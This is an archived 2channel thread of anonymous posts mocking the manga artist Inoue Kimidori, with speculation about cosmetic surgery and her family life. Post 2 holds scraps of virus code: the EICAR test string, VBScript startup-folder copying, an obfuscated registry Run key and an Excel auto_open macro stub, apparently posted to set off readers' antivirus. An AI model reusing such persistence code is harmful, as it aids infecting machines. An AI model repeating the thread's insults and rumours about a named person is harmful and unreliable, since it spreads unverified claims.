5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ブログに】井上きみどり7【掲示板はありません】

1 :花と名無しさん:2007/01/17(水) 17:20:07 ID:???0
叩き荒らしはスルーで。
相手にするあなたも荒らしです。

前スレ
【義父母とは】井上きみどり6【仲良しですよ?】
http://comic7.2ch.net/test/read.cgi/gcomic/1155049968/

過去スレ
【いまいち】井上きみどり5【新連載】
http://comic6.2ch.net/test/read.cgi/gcomic/1136126531/
【いちいち】井上きみどり5【恩着せがましい】
http://comic6.2ch.net/test/read.cgi/gcomic/1124931896/
【子供なんか〜】井上きみどり4【連載終了】
http://comic6.2ch.net/test/read.cgi/gcomic/1111199964/
【ポチ】井上きみどり3【ケロ】
http://comic6.2ch.net/test/read.cgi/gcomic/1090539171/
【ダイエット】井上きみどり2【シテクダサイ】
http://comic.2ch.net/test/read.cgi/gcomic/1048334060/
【私生活は】井上きみどりについて【全てネタ】
http://comic.2ch.net/test/read.cgi/gcomic/1048334060/

掲示板ナシのシンプルすぎるブログw
ttp://hi-kimidori.cocolog-nifty.com/
※きみどりはコメント欄と掲示板の区別がついていません。

2 :花と名無しさん:2007/01/17(水) 17:20:36 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


3 :花と名無しさん:2007/01/17(水) 17:46:13 ID:???0
きみどり必死だなw

4 :花と名無しさん:2007/01/17(水) 17:55:11 ID:TQ5enJdY0
ライラックをチューリップって・・・アホだ。

5 :花と名無しさん:2007/01/17(水) 22:06:08 ID:???0
きみどりの書く「ププっ。」っていう表現が大嫌いだ!

6 :花と名無しさん:2007/01/17(水) 22:18:55 ID:???0
きみどり自身がプギャーそのものなのにね

7 :花と名無しさん:2007/01/17(水) 23:22:33 ID:???O
小1たいむ立ち読みしてきた。
ケロがもう小学生になったのか・・・
という事以外記憶に残ってない。

8 :花と名無しさん:2007/01/18(木) 08:12:51 ID:???0
登校拒否は治らないとどっかで読んだので
ポチとケロを心配してたんだけど、今元気に
学校に行ってるってことはそれ何だったのかしら、
なんんちゃって登校拒否?ただの甘え症?

9 :花と名無しさん:2007/01/18(木) 08:36:40 ID:???0
このスレ開くとウィルス検出するんだが。

10 :花と名無しさん:2007/01/18(木) 10:04:59 ID:???0
>>9
ノートンの設定で専用ブラウザを外せばおk

11 :花と名無しさん:2007/01/18(木) 12:39:47 ID:???O
>>1さん乙です!

それと遅くなりましたが前スレ>>981さん、毎週ありがとうです!
私は今回は、わりと「ほぉ〜!」と思いながら読んだ。
意外と忘れがちな所をサクっと突かれた感じ。




まぁ、きみどりさんの言葉じゃなくてひーちゃんの言葉なんだが。

12 :花と名無しさん:2007/01/18(木) 14:19:14 ID:???0
きみどりではなく、ひーちゃんがコラム書いたほうが面白そうだなw

13 :花と名無しさん:2007/01/18(木) 15:06:35 ID:???0
>>10
ありがとう。解決した。

それはそうと
ブログならまだしも、新聞に掲載する文章に「娘1号、2号」は使わないほうがいいんじゃないかな。
まっとうな日本語じゃないでしょ。


14 :花と名無しさん:2007/01/18(木) 15:24:48 ID:???0
今回ひーちゃんがいったことばは
運動会や学芸会がある度に学校からiわれる言葉だよね。
今さら何を申すか、と思ったよ。
でも今までの中では一番まとまっているかな?と思った。
でももっと頑張れきみどり。誉めて伸ばしてほしいんだろうか?

15 :花と名無しさん:2007/01/18(木) 17:09:04 ID:???0
前スレ>>927
母親が死んで居ないのと、居るのに大して手を掛けてもらえなかったのとでは
大違いだろう。
虐待されて育っても子供を大事に育てる人はいるが
ほとんどの人が「自分も虐待するんじゃないか?」「子供を愛せない」「愛し方がわからない」
と悩んでいるのは無視するのか?
「そうなるのは人間性の問題だ」と愛されて育ったあんたには言われたくないね。
私も母親がネグレクト状態だったから、きみどりが母親を怨む気持ちは解る。
もっと早くに卒業するべきだとは思うが、これは個人差の問題だからな。
義父母を実の親のように慕ってあれこれ頑張る姿は偉いし微笑ましく感じる。
実親との関わりが悪くても、夫の親などと親子関係をやり直せる事が
きみどりを見ていると解って安心出来るし。
うちは失敗したけどw

16 :花と名無しさん:2007/01/18(木) 17:37:38 ID:???0
ねえきみどり、前スレのレス書くなら本文も転載してくれない?

17 :花と名無しさん:2007/01/18(木) 18:37:36 ID:???O
>>15
きみどり乙


18 :花と名無しさん:2007/01/18(木) 20:18:28 ID:???0
>>15
>夫の親などと親子関係をやり直せる
いやー旦那の親なんて嫁は嫁だと思ってるよ。いくら仲良くたって、他人だもの。
まぁひーちゃんは男兄弟だからまだましかな。
娘がいた場合は、娘>>>>>嫁だよね。あたりまえだけど。
きみどりがひーちゃん義父母の娘気分でいるとしたら、思い上がるなって感じだね。

19 :花と名無しさん:2007/01/18(木) 20:38:17 ID:???0
意地悪な人が多くてコワイ

20 :花と名無しさん:2007/01/18(木) 20:47:14 ID:???0
>>18
きみどりはどう思ってるかわからないけど
親の愛情をあまり受けられなかったと思ってる人は
少しでも大切に扱われるとすごーくありがたく感じるんじゃないかな。
息子の嫁だからこそやさしくもしてもらえるんだが
そんなことは承知で、純粋に嬉しいんだと思うよ。
だから相手を大切にしたいとも思う。
きみどりが娘気分ならそれでいいと思うよ
義父母がどう思ってようが本人が幸せならば。
もしかしたらきみどりが変わったのって義父母の影響もあるかもね‥

その結果漫画家としてはつまんない人になっちゃったけどw

21 :花と名無しさん:2007/01/18(木) 20:54:45 ID:???0
>>18
自分の息子の嫁が慕ってきたらそう言えば?

22 :花と名無しさん:2007/01/18(木) 21:11:47 ID:???0
>>15
親との関わりあい方に個人差があるのは当然だろう。
だからどんなに親を恨んでいようが、そんなものは個人の自由だと思う。

きみどりの問題点は、親とのこじれた関係をいつまでも引きずってることじゃなくて、
そういう個人的な私怨を文章にして金取ろうとしてることでしょ。
ああいう個人的な私怨の垂れ流しに、読者がお金払う価値があるかどうか
もうちょっと客観的になって考えてもらいたいよ、きみどりには。

23 :花と名無しさん:2007/01/18(木) 21:37:04 ID:???0
ところで仙台の小学校ってまだ冬休みなの?

24 :花と名無しさん:2007/01/18(木) 21:42:54 ID:???O
義母ちゃん義父ちゃんが仙台来てから、サクラの話題出た?
あんだけ我が子のように騒いだわりに、少しも触れてない気が…

25 :花と名無しさん:2007/01/18(木) 22:13:30 ID:???0
>23
先週月曜から始まってるよぉ。

26 :花と名無しさん:2007/01/18(木) 22:18:02 ID:???0
サクラ死んだんじゃなかったっけ?

27 :花と名無しさん:2007/01/18(木) 22:35:50 ID:???0
えっサクラ死んじゃったの?!

28 :花と名無しさん:2007/01/19(金) 02:30:40 ID:???0
きみどりって父親のことはどうなんだろ?ジェシーだっけ?
異性の家族には甘いのかな?
ねーちゃんとは仲がいいのね。
憎しはオードリーだけって感じがする。

29 :花と名無しさん:2007/01/19(金) 08:42:55 ID:???0
>>16
じーちゃん、サクラのために田舎暮らししたかったんじゃなかった?

30 :花と名無しさん:2007/01/19(金) 08:45:24 ID:???0
>>29
レス番まちがえた、>>26だった

31 :花と名無しさん:2007/01/19(金) 09:29:43 ID:???0
そういえばサクラが全く描かれていないし、本当に死んだのかもね・・・

32 :花と名無しさん:2007/01/19(金) 12:26:14 ID:???0
小1タイム読んできた。

ポチのことあんまり書いてなかった。
ケロは登校拒否してる。
きみどりの自画像が、やせて目が大きくなってた。

これだけ。
つくづく普通の育児漫画になったなー
いや、つまんないから普通の育児漫画以下か。

33 :花と名無しさん:2007/01/19(金) 12:52:45 ID:???O
私も今読んで来た。
パンダ着ぐるみの頃の丸目も大概イヤだったけど、可愛いぶりがプラスされてるな…
目つきの悪いのがウリじゃなかったのかよう

34 :花と名無しさん:2007/01/19(金) 12:56:22 ID:???0
いまさらだけど、きみどりって驕りがひどいね

35 :花と名無しさん:2007/01/19(金) 15:38:04 ID:???0
>>22
だね だから春菊化してるって意見もでてるのに・・・
一回自分の闇を垂れ流してそれを肯定されたと思った瞬間から
歯止めってがきかなくなるものなの?

36 :花と名無しさん:2007/01/19(金) 16:02:13 ID:???0
だからこそ編集がしっかりしないといけないのに、馴れ合っちゃってるんだもん。

37 :花と名無しさん:2007/01/19(金) 16:05:26 ID:???0
そうそう忘れてた
>>21
きみどり乙w

サクラが死んだことって、どこかに書いてあったっけ?
広島の実家では庭をサクラ仕様にして大きな犬小屋置いて飼ってたんだよね。


38 :花と名無しさん:2007/01/19(金) 17:38:53 ID:???0
>>37みたいに自分の気に食わないレスは全部きみどりだってのは
なんだか病気の人みたいでキモス
過剰な叩きにも繋がるからどうかなと思うし。
前はポチの作品がうpされたらみんな素直に可愛い!って喜んでたのに
今はそれにも「娘自慢」とかって難癖つけてるし。

39 :花と名無しさん:2007/01/19(金) 17:51:04 ID:???O
>>38きみどりさん乙
援護に対して本人と認定するのは>>37一人だけじゃないってばwww

40 :花と名無しさん:2007/01/19(金) 17:54:40 ID:???0
確かにきみどりはもはやかばう気になどなれない。
どころでどこにポチを娘自慢なんて書いてあった?
たとえあっても少数意見だと思うんだが、
それをまるでこのスレ全体が非難しているように
書き込んでいる人が…38の他にもいたよねぇ…。

41 :花と名無しさん:2007/01/19(金) 19:13:12 ID:6yvIoyyk0
>>15
前スレ927です。
確かに虐待されて育ったのなら克服するのは大変だろうが
それを今だにずるずる引きずって公の場で書く事か?と
思うんだけど。虐待された人だってがんばって子育てしてるんだから。
愛情の引き出しがないと愛情を注げないなんて書かないでよ。
しかも自分だって子供に愛情あげられなかったんでしょ?
もし将来ポチやケロが執筆する仕事に就いて公の場で
「うちの母は仕事を優先させるひどい母でした。きっと私たちより仕事が大事だったと思います。
子供の頃はとてもさびしかったです。不登校になったのもきっと母のせいです」
なんて言われても絶対逆ギレしないでね。そこでまた、オードリーのせいだって
言わないでね。きみどりさん。
あなただって同じ事してるんだからさ。オードリーの気持ち1回でも考えて見た?
人間は許して成長するって聞いたことあるよ。

42 :花と名無しさん:2007/01/19(金) 22:08:31 ID:???0
>>40
前スレにあったよ

43 :花と名無しさん:2007/01/19(金) 22:10:08 ID:???0
このスレで叩いてる人たちってマジで擁護や反論は井上きみどりだと思ってるの?

44 :花と名無しさん:2007/01/19(金) 22:30:49 ID:???0
それはあなたが一番よくご存知なはずです。

45 :花と名無しさん:2007/01/19(金) 22:37:00 ID:???0
>>41
ハゲドウ。
辛い思いを引きずって生きていくのは別にかまわないと思うんだが、それを何度も何度も
世間に向けて吐き出すのがいただけない。
私自身、虐待されて施設送りになった経験があるが(その後祖母宅で育ててもらった)、
そういう経験は簡単に乗り越えられるものでないし、折々に触れて思い出しては苦しくなる。
しかし、それを関係のない人に言おうとは思わない。
吐き出したければ、専門家に吐き出せ。
金を出して読んでいる読者をゴミ箱にするな。

46 :花と名無しさん:2007/01/19(金) 22:53:27 ID:???0
>>43
擁護や反論をきみどり本人だとは、別に誰も本気で思っていないんじゃないの。
単に茶化してるだけだと思うよ。

>>45
>金を出して読んでいる読者をゴミ箱にするな。
本当に内田春菊みたいになってきたね。
私はきみどりが両親に私怨を持ってても、それを作品で吐き出しても別にいいと思う。
ただどうせなら、私怨ネタでも面白いものを描いてほしいよね。
金払ってただの愚痴を読まされるのはキツイわ。

47 :花と名無しさん:2007/01/19(金) 23:12:32 ID:???0
>>43
私は>>37ではお約束的意味合いで「きみどり乙」と書いたよ。
あえてw付きで。
そしたら>>38みたいな反応があって苦笑したけどね。

48 :花と名無しさん:2007/01/20(土) 00:25:49 ID:???O
このスレでのきみどり乙は
ぬるぽに対するガッみたいなもんという事に。

本当にさくら死んじゃったの・・・?
まだ若いよねえ?

49 :花と名無しさん:2007/01/20(土) 00:52:41 ID:???0
エエエエ!さくら死んじゃったの?
早い!いくらなんでも早すぎる!
犬の寿命って、大体10年くらいでしょ?
さくらってまだ5歳くらい?
事故?病気?
さくらって、ひーちゃん両親とともに仙台に来てたんだっけ?

50 :花と名無しさん:2007/01/20(土) 01:46:43 ID:???O
>>38>>42
あったかなぁ。娘自慢ってレス。

娘自慢するならしたらいいのに、わざわざアップして「意味がない」とか「くだらない」みたいな書き方するから
みんなきみどりさん非難してポチかばってたんじゃなかった?


51 :花と名無しさん:2007/01/20(土) 03:20:43 ID:???0
ひーちゃんが娘自慢するのを苦々しく見てたくせに
今じゃ自分がが同じことしてる・・・的なレスはあったよ前スレで

52 :花と名無しさん:2007/01/20(土) 05:27:59 ID:???O
>>51
娘には自分より幸せになってほしくない心理なのかな
男親が娘を誉めるのを嫌がるのは

53 :花と名無しさん:2007/01/20(土) 10:38:46 ID:???0
将来子供に「母親なんて大嫌い」と救いの無い本書かれそうw

54 :花と名無しさん:2007/01/20(土) 11:45:13 ID:???0
『「キライの裏側」の裏側』とかw

55 :花と名無しさん:2007/01/20(土) 13:09:44 ID:???0
ポチちゃん、ケロちゃんのその後が気になるのだが
小1タイムの感想が皆、ガッカリレスばかりなんだね・・・・・・
ブクオフで買うことにした。

それにしても北海道旅行記、もういいってば〜!

56 :花と名無しさん:2007/01/20(土) 13:51:51 ID:???0
>>55
マンガにも使うんだよね・・・?
ブログとダブリまくりの悪寒

57 :花と名無しさん:2007/01/20(土) 14:58:02 ID:???0
1つのネタをいろんなところで使いまわす。
これも内田春菊の得意芸ですね。
きみどりさん、どんどん春菊化していくな〜

58 :花と名無しさん:2007/01/20(土) 15:05:26 ID:???0
きみどり、女優デビューして脱ぐ妄想してんじゃないのw

59 :花と名無しさん:2007/01/20(土) 15:58:11 ID:???0
>女優デビューして脱ぐ妄想

いかに春菊化してるとはいえ、それだけは無いと信じたいw
春菊よりは「恥」ということを知っている人だと、まだ思いたいw


60 :花と名無しさん:2007/01/20(土) 17:06:10 ID:???0
恥を知っていたら、銀田一みたいなマンガは描かないと思われ

61 :花と名無しさん:2007/01/21(日) 19:06:57 ID:???0
少しずつ整形してるのもメディア露出を考えてるから?

62 :花と名無しさん:2007/01/21(日) 22:19:26 ID:???0
目頭切開スレ

63 :花と名無しさん:2007/01/21(日) 22:22:58 ID:???0
加齢と過酷な減量による肉の移動じゃないの?
人相が変わっても仕方ない肉の移動だもんね。
小学生一人分の重さ…。よく考えたらすごいわ。

64 :花と名無しさん:2007/01/21(日) 22:48:39 ID:???0
>>55
ここで褒めると叩かれるか更にきみどりを叩く馬鹿がいるから
プラス評価の感想はここには書かないだけ。

65 :花と名無しさん:2007/01/21(日) 22:53:16 ID:???0
フィクションと称しても実質ノンフィクだからテレビ化も期待できません。

66 :花と名無しさん:2007/01/21(日) 22:54:01 ID:???0
>>64
きみどり乙

67 :花と名無しさん:2007/01/22(月) 00:31:10 ID:???0
>>63>>64
きみどり乙w
整形の言い訳乙wwww

68 :花と名無しさん:2007/01/22(月) 01:31:42 ID:???0
>>55
ポチは一年で12cmも身長が伸びたんだって。
このまま中学高校と太らなかったら
モデル並のスタイルになるんじゃない?

69 :花と名無しさん:2007/01/22(月) 02:04:24 ID:???0
横峯さくらをマシにした様なつぶらな瞳だったのに、
中村うさぎになってたのは正直驚いた>きみどりサン

70 :花と名無しさん:2007/01/22(月) 02:18:41 ID:???0
太ってた頃の写真ってどれも笑顔じゃなかった?
きみどりって横に大きい目だし、笑ってたら誰でも細くなるでしょ。
顔の肉も大分落ちたし、目が大きくなってもおかしくは無い。
すぐに整形認定したがる人って自分の顔によっぽどコンプレックスがあるのかね。

71 :花と名無しさん:2007/01/22(月) 02:32:52 ID:???0
>>70
きみどり、早く寝なさいw

72 :花と名無しさん:2007/01/22(月) 02:50:31 ID:???0
作品の出来の悪さはガンガン叩きたいけど
整形かどうかなんて別にどうでもいいや。

73 :花と名無しさん:2007/01/22(月) 03:00:36 ID:???0
ここまで必死だとひーちゃん関係の女が
頑張ってるのかとエスパーしてしまう。
相手するしないは置いといてモテるだろうし。

74 :花と名無しさん:2007/01/22(月) 03:07:01 ID:???0
前スレから思ってたけど、整形ってレスがつくと、必死に擁護する人がいるよね。即レスでさ。
普段まったり進んでるスレなのになんだかな〜って思う。

75 :花と名無しさん:2007/01/22(月) 03:24:24 ID:???0
>>73
ごめん、日本語の意味がちょっと…
「エスパーしてしまう」ってどういう意味さ?

76 :花と名無しさん:2007/01/22(月) 03:27:36 ID:???0
きみどりの目まんまる自画像になってからつまんなくなった
目つきの悪かった自画像の頃は面白かったのに。
パンダの着ぐるみ着たり女子高生コスしたり
ブログでは恥ずかしい自分撮りブリブリ写真載せたり
そういうの嫌いだったんじゃないの?

77 :花と名無しさん:2007/01/22(月) 05:25:45 ID:???0
>>74
決め付け方が気持ち悪いだけ。
見ただけで整形してるかどうかわかるのなんて
整形外科医か経験者だけでしょ。

78 :花と名無しさん:2007/01/22(月) 08:52:36 ID:???0
もてるって誰?え・・まさかひーちゃん・・・?

79 :花と名無しさん:2007/01/22(月) 09:57:23 ID:???0
>>77
ほとんどの芸能人は整形してますけどなにか?

80 :花と名無しさん:2007/01/22(月) 10:04:14 ID:???0
YOUスレにきみどりハケーン

もう基地害だね

81 :花と名無しさん:2007/01/22(月) 11:22:53 ID:???0
>>79
芸能人ときみどりを一緒にするなよw

82 :花と名無しさん:2007/01/22(月) 11:45:20 ID:???0
>>81
芸能人の顔を見れば「整形したのはすぐわかる」なんだけど。
どこが芸能人と一緒しているんだ?

83 :花と名無しさん:2007/01/22(月) 12:28:16 ID:???0
>>82
あなたの説明不足。
最初から「芸能人の顔を見れば整形したのはすぐわかる」って書けば伝わるのに。

84 :花と名無しさん:2007/01/22(月) 12:33:30 ID:???0
無知を他人のせいにするのも整形デブ特徴だね

85 :花と名無しさん:2007/01/22(月) 12:46:19 ID:???0
整形ネタはなんでこう荒れるんだ


86 :花と名無しさん:2007/01/22(月) 12:48:18 ID:Z2uzzDGQ0
整形話したい奴は整形板にでも行ってくれよ。
ここは少女漫画板だ。


87 :花と名無しさん:2007/01/22(月) 12:53:37 ID:???0
>>83
なにこの逆ギレw

88 :花と名無しさん:2007/01/22(月) 12:55:25 ID:???0
ま、整形してなかったら、目の描き方も変えてないと思うよ。
意味無く褒められたい認められたい症候群のきみどりらしい。

89 :花と名無しさん:2007/01/22(月) 13:03:21 ID:???0
整形する必要性が感じられないんだが。
人前に顔を晒さなきゃいけない職業の人や若い女ならともかく
いい年こいた三流育児漫画家が整形して何の得があるというのか。

90 :花と名無しさん:2007/01/22(月) 13:06:50 ID:???0
このスレ実質何人ぐらいで回してるんだろ?
もしかしてずーっと同じ人がやりあってるとかw

91 :花と名無しさん:2007/01/22(月) 14:34:05 ID:???0
>>89
自分大好きのきみどりだから、整形してもおかしくないかと。
ちょっとばかし痩せたのが嬉しくて欲も出たと見た。

>>90
そう思わないとやってられないよね、きみどり自身としては。
でもYOUの発行部数からしても、その百分の一はここにいても
おかしく無いから。

92 :花と名無しさん:2007/01/22(月) 15:25:47 ID:???0
きみどり、編集長が変わればお払い箱だよ。

93 :花と名無しさん:2007/01/22(月) 15:48:30 ID:???0
きみどりの整形前、整形後を比較できる画像ある?
どう変わったのか知りたい。

94 :花と名無しさん:2007/01/22(月) 16:41:34 ID:???0
ttp://hi-kimidori.cocolog-nifty.com/photos/uncategorized/0_35.jpg
ttp://image.blog.livedoor.jp/news4vip2/imgs/3/5/354a21ed.jpg
目頭の形状が同じwなだらかな曲線を描かない不自然な目の形だね。

95 :花と名無しさん:2007/01/22(月) 16:56:28 ID:???0
きみどりってさー、美人な母と姉にコンプ持ってたって事は
ジェシー似(?)の結構なブスだったんだよね?
でも今の顔画像見ても、結構綺麗な方だと思うし
やっぱり大改造したのかなーって思っちゃう。

96 :カオス:2007/01/22(月) 16:59:59 ID:???0
カオス

97 :花と名無しさん:2007/01/22(月) 18:22:18 ID:???0
ノートン先生が反応して見れなかったから、あがってて嬉しい。
でも開けない(・ω・;)(;・ω・)

98 :花と名無しさん:2007/01/22(月) 18:31:31 ID:???0
>>94
ありがと。
なるほど、目頭の涙丘が露出しているのね。
いつごろからこうなったの?
以前はどうだっけ?

99 :花と名無しさん:2007/01/22(月) 19:16:45 ID:???0
>>91
ナルシストは整形しないよ。
芸能人が整形するのは自分よりも美形が多くて愕然として
事務所の社長やマネージャーの言うままに整形するだけ。
きみどりはタレントじゃないから愕然とする機会は無いし
整形するなら脂肪吸引をするんじゃない?

100 :花と名無しさん:2007/01/22(月) 19:53:22 ID:???0
>>99
目頭切開と脂肪吸引は金額が違いすぎて比べられないんだけどw
話そらそうとして無駄だよw

以前YOUに載っていたデブ写真とは、脂肪のせいがあるにしても目の形が違いすぎる。
漫画の自画像の目の描き方が変わった=目の整形、目頭切開で間違いない。

以前のように描いてりゃ誰も気づかないのに、自己顕示欲が強くて墓穴掘ったきみどりw

101 :花と名無しさん:2007/01/22(月) 20:34:50 ID:???0
>>100
YOUに載ってた画像うpきぼん

102 :花と名無しさん:2007/01/22(月) 20:43:11 ID:???0
>101

はいどうぞ
ttp://you.shueisha.co.jp/edit/report/0827/top.html

103 :花と名無しさん:2007/01/22(月) 20:48:28 ID:???0
きみどりはキライだし、前スレではさんざん批判したけど(文章をね)
整形厨はいいかげんウザい。漫画家の顔なんぞどーでもいい。

もしも整形してたとしても、何が悪いんだ。
整形デブとか言いすぎ。これは批判じゃなくてタダの悪口。しかも頭悪そう。
ずーっと前のスレの私怨チャンと同じ臭いがする。

104 :花と名無しさん:2007/01/22(月) 20:49:31 ID:???0
>>102
うわ、このページ見たことなかったw
目つき悪いデブだなw

105 :花と名無しさん:2007/01/22(月) 20:50:33 ID:???0
>>103
だったらNGワードに入れろよ
お前専用のスレじゃないんだよ

106 :花と名無しさん:2007/01/22(月) 20:54:55 ID:???0
>>103
ハゲドウ
漫画の話しようよ。

>>105
整形厨専用スレでもないと思うがな。

107 :花と名無しさん:2007/01/22(月) 21:05:00 ID:???0
こうして>>103の自演が始まった。

108 :花と名無しさん:2007/01/22(月) 21:17:51 ID:???0
作者が必死で大盛りあがりのスレですね

109 :花と名無しさん:2007/01/22(月) 22:19:02 ID:???O
日に日にきみどりの自作自演が多くなってきて嫌ね

110 :花と名無しさん:2007/01/22(月) 22:26:36 ID:???0
たかが三流漫画家が整形してようがしてまいが
ファンやヲチャーにとってはどうでもいい事。ここは漫画板だからね。
整形は絶対してない!とムキになってるレスの方が不自然だと思わないの?


111 :花と名無しさん:2007/01/22(月) 22:40:46 ID:???O
>>102の写真を見る限り・・・サイズは2Lだね
お洒落とは程遠いし

112 :花と名無しさん:2007/01/22(月) 22:49:32 ID:OvIzQJdM0
ブログとまってるね。見てるのかな、、、ココ

113 :花と名無しさん:2007/01/22(月) 22:50:11 ID:???0
・・・。

114 :花と名無しさん:2007/01/22(月) 22:51:33 ID:???O
確かにきみどりは太りはじめてから面白くなくなってきた。
でも今痩せたはずなのに面白さは戻ってない。
西原や現代洋子みたいな体当たり漫画の方があってると思うんだけどな。
ストーリー作って漫画かくの、きみどりには無理だよ。

115 :花と名無しさん:2007/01/22(月) 22:51:40 ID:???0
誰が見ても必死すぎる整形否定をする>>110が不自然に思います。

116 :花と名無しさん:2007/01/22(月) 23:01:50 ID:???O
え、>>110は整形肯定派じゃね?

117 :花と名無しさん:2007/01/22(月) 23:05:23 ID:???0
きみどりの顔なんて語る価値ないと思うんだが…。
しかし、漫画が酷い。
本当に残念なことだ。

118 :花と名無しさん:2007/01/22(月) 23:07:49 ID:???0
うん、顔はどーでもいいから本業の漫画を何とかしてほしい。
もしかして今連載しているのって評判いいんだろうか。

119 :花と名無しさん:2007/01/22(月) 23:37:34 ID:???0
そもそも、YOU今号の顔を可愛く描きすぎたのが原因なんだが?

120 :花と名無しさん:2007/01/23(火) 10:10:25 ID:???0
きみどりが来ないと静かなスレw

121 :花と名無しさん:2007/01/23(火) 14:29:14 ID:???0
一日に30分の暇も無い人が2ちゃんなんかに来るの?

122 :花と名無しさん:2007/01/23(火) 14:50:09 ID:???0
>>102
顔の輪郭からして違うじゃないかw
これだけ肉の量が違えば人相が変るってw
20kg以上の差があるだろw
脂肪20kgってすごい量だぞw

123 :花と名無しさん:2007/01/23(火) 15:14:13 ID:???0
きみどり連投中w

124 :花と名無しさん:2007/01/23(火) 15:17:14 ID:???0
早くブログ更新しろ


125 :花と名無しさん:2007/01/23(火) 16:09:04 ID:???0
まあ整形してないにせよ、自画像の描き方を元に戻さないと永久に叩かれるということだ。

126 :花と名無しさん:2007/01/23(火) 16:24:21 ID:???0
>>122
「w」いっぱい使って20レスも前の過ぎた話に擁護レスですか?w
何故そんなに必死なの?

127 :花と名無しさん:2007/01/23(火) 16:55:15 ID:???0
本人だから

128 :花と名無しさん:2007/01/23(火) 18:14:01 ID:???0
やっとブログ更新したけど…

動物園はもうあきたorz

129 :花と名無しさん:2007/01/23(火) 20:28:09 ID:???0
>行ってみて初めてわかったのですが
>旭山動物園ってすごい人気がある動物園なんですねえ〜。
ハァ?
人気だって知らないで行ったの?そんなわけないよね。


130 :花と名無しさん:2007/01/23(火) 21:51:47 ID:???0
ネタ尽きているのに無理矢理書くからだよ
タダでさえ駄文しか書けないのに

131 :花と名無しさん:2007/01/23(火) 21:58:07 ID:???0
>>126
本当にね。
ここはチャットなんだから空気読むべき。

132 :花と名無しさん:2007/01/23(火) 22:12:08 ID:???0
>>122
       _, ,_
 w  (・ω・ )
 (~)、 /   i  )
  \ ` |_/ /|
   `ー_( __ノ |
    (  `(  、ノ
   ww_ノ`i__ノ



        _, ,_
 w  ( ・ω・ )
 (~)、 /   i  )
  \ ` |_/ /|
   `ー_( __ノ |
    (  `(  、ノ
   ww_ノ`i__ノ

133 :花と名無しさん:2007/01/23(火) 22:26:53 ID:???0
>>132 こっち見んな!w

134 :花と名無しさん:2007/01/23(火) 22:33:59 ID:???O
ジャンクフード馬鹿食いして太ったきみどりさんに、海苔の白い線の材料を気にする資格はありません

135 :花と名無しさん:2007/01/23(火) 22:49:23 ID:???O
この動物園ネタをコーラスに使うんだね。
きっとブログそのままの内容だね。
登場人物はまずおめめぱっちりなきみどりかw

136 :花と名無しさん:2007/01/23(火) 22:52:31 ID:???0
白いのはカルシウム。

添加物=悪、という浅はかな発想しか出来ないきみどり。
ちょっと検索すればすぐヒットするのに、こういう手間は惜しむよね。だから太るんだよ。

137 :花と名無しさん:2007/01/24(水) 00:49:09 ID:???O
>>102
久々に見たらやせてるわー

138 :花と名無しさん:2007/01/24(水) 00:53:22 ID:???O
もうさ、きみどり乙って言われて嫌なら2ちゃんなんて大キライでも書いてみやがれって思う
批判書かれたら「なにを〜っ!名無しの赤の他人にそこまで言われる筋合いないぞ!」ってキレたり、
中傷されたらガクーッと落ち込んでポチやイメルダに励まされてホロッときたり、
援護や持ち上げレスをコッソリ書き込むひーちゃんを「えーいっ!そんな事したらジエンだって思われるだろー!」と叱ったり・・・
まあ、こんなパターンしかないだろうけどさ

139 :花と名無しさん:2007/01/24(水) 01:27:33 ID:???0
↑まじできみどりが書き込みしてると思ってる人が居て吃驚した

140 :花と名無しさん:2007/01/24(水) 02:04:58 ID:???0

この人みたいな「きみどりは絶対に整形はしてない!」「絶対このスレできみどりが自演なんてするわけがない!」
と必死に念仏の様に唱えてる人って何なの?

141 :花と名無しさん:2007/01/24(水) 02:31:08 ID:???0
2ちゃんで何を言われようと無視すればいいのにね。

142 :花と名無しさん:2007/01/24(水) 03:02:51 ID:???0
>>140
一人しかいないと思ってるのか。
ちなみにあたしはポチよ〜〜(クネクネ

143 :花と名無しさん:2007/01/24(水) 08:03:40 ID:???0
>>138の冷静なパターン分析能力には恐れ入る
きみどりに見せてやりたいなw

144 :花と名無しさん:2007/01/24(水) 09:38:32 ID:Ms/9uThU0
>>140
自演してるという証拠もなければ
自演してないという証拠も無いだろう。

従って自演ネタはどうでもいい。
憶測で話をすすめることほど馬鹿らしいことはない。

145 :花と名無しさん:2007/01/24(水) 10:16:51 ID:6ZswThaz0
>>144 うむ。ドウイ。とりあえず、私はアゲで書いてみようかと思う。

146 :花と名無しさん:2007/01/24(水) 10:38:44 ID:Iaf6SP+iO
新作のネタで盛り上がりたいものだが、あれだけ引っかかってこないとなぁ…

編集との長年の馴れ合いで潰れてしまったんだね。


147 :花と名無しさん:2007/01/24(水) 14:33:34 ID:???0
今のYOU読めば、やる気の無い編集部がよくわかる
きみどりが表紙なんてありえない

148 :花と名無しさん:2007/01/24(水) 15:28:02 ID:???0
>>139
きみどりが書き込みしてるという証拠もなければ
きみどりが書き込みしてないという証拠も無いだろう。

149 :花と名無しさん:2007/01/24(水) 15:29:14 ID:???0
ttp://hi-kimidori.cocolog-nifty.com/photos/uncategorized/0_35.jpg
ttp://image.blog.livedoor.jp/news4vip2/imgs/3/5/354a21ed.jpg

150 :花と名無しさん:2007/01/24(水) 16:54:18 ID:???0
この目つきで今号の表紙プゲラ

151 :花と名無しさん:2007/01/24(水) 17:21:04 ID:lebpQqua0
